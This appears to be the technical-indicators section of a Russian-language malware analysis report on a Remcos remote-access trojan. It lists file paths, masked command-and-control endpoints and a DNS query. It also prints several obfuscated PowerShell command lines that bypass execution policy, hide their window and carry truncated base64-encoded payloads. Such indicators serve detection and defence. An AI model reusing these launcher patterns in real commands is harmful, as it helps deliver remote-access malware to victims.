Техническая информация
- %WINDIR%\microsoft.net\framework\v2.0.50727\msbuild.exe
- %APPDATA%\remcos\logs.dat
- 'pa##e.ee':443
- '16#.#8.122.235':7775
- DNS ASK pa##e.ee
- '%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' PowERsHELl.`ExE -ExecutionPolicy bypass -w 1 /`e JABOAHgASgBtAEYAZAAgAD0AIAAoACcAewAyAH0AewAwAH0AewAxAH0AewAzAH0AJwAtAGYAJwBkAFMAdAAnACwAJwByAGkAbgAnACwAHCBgAEQAYABvAGAAdwBuAGAAbABgAG8AYQAdICwA...' (со скрытым окном)
- '%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' PowERsHELl.`ExE -ExecutionPolicy bypass -w 1 /`e JABOAHgASgBtAEYAZAAgAD0AIAAoACcAewAyAH0AewAwAH0AewAxAH0AewAzAH0AJwAtAGYAJwBkAFMAdAAnACwAJwByAGkAbgAnACwAHCBgAEQAYABvAGAAdwBuAGAAbABgAG8AYQAdICwA...
- '%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' -ExecutionPolicy bypass -w 1 /e JABOAHgASgBtAEYAZAAgAD0AIAAoACcAewAyAH0AewAwAH0AewAxAH0AewAzAH0AJwAtAGYAJwBkAFMAdAAnACwAJwByAGkAbgAnACwAHCBgAEQAYABvAGAAdwBuAGAAbABgAG8AYQAdICwAJwBnACcAKQA7AFsAd...
- '%WINDIR%\microsoft.net\framework\v2.0.50727\msbuild.exe'